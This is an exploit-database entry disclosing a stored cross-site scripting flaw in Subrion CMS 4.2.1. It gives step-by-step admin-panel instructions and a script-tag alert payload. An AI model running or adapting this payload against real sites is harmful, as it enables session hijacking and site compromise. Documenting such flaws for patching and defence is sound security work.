Exploit for Subrion CMS 4.2.1 Cross Site Scripting

Name: Exploit for Subrion CMS 4.2.1 Cross Site Scripting
Rating: 5 (95 reviews)

2023-03-28 | CVSS 6.8

## https://sploitus.com/exploit?id=PACKETSTORM:171545
# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)  
# Date: 2022-08-10  
# Exploit Author: Sinem Şahin  
# Vendor Homepage: https://intelliants.com/  
# Version: 4.2.1  
# Tested on: Windows & XAMPP  
  
==> Tutorial <==  
  
1- Go to the following url. => http://(HOST)/panel/fields/add  
2- Write XSS Payload into the tooltip value of the field add page.  
3- Press "Save" button.  
4- Go to the following url. => http://(HOST)/panel/members/add  
  
XSS Payload ==> "<script>alert("field_tooltip_XSS")</script>   
  
Reference: ://github.com/intelliants/subrion/issues/895